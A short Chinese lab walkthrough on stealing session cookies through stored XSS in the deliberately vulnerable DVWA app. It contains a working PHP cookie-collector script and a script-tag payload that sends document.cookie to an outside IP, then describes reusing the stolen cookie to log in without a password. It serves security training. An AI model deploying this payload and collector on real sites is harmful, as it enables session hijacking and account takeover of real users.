1. 程式人生 > >存儲型xss盜取cookie實驗

存儲型xss盜取cookie實驗

xss DVWA

聲明:僅供交流使用,嚴禁違法犯罪,否則後果自負

1,準備接收cookie的環境:

ip為172.24.10.105

代碼為:保存為 getCookie.php

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "w");
fwrite($log, $cookie ."\n");
fclose($log);
echo "攻擊成功";
?>


2,在實驗環境插入js代碼:

<script>document.location='http://172.24.10.105/getCookie.php?cookie='+document.cookie;</script>


通過審查元素把限制取消,然後插入js代碼

技術分享圖片

技術分享圖片

然後重新訪問這個頁面發現進行了跳轉

技術分享圖片

並在接收cookie的平臺看到了cookie

技術分享圖片



換一個瀏覽器設置cookie



技術分享圖片



直接訪問:

http://127.0.0.1/DVWA/

無需密碼登錄成功

技術分享圖片






歡迎關註微信公眾號

技術分享圖片

存儲型xss盜取cookie實驗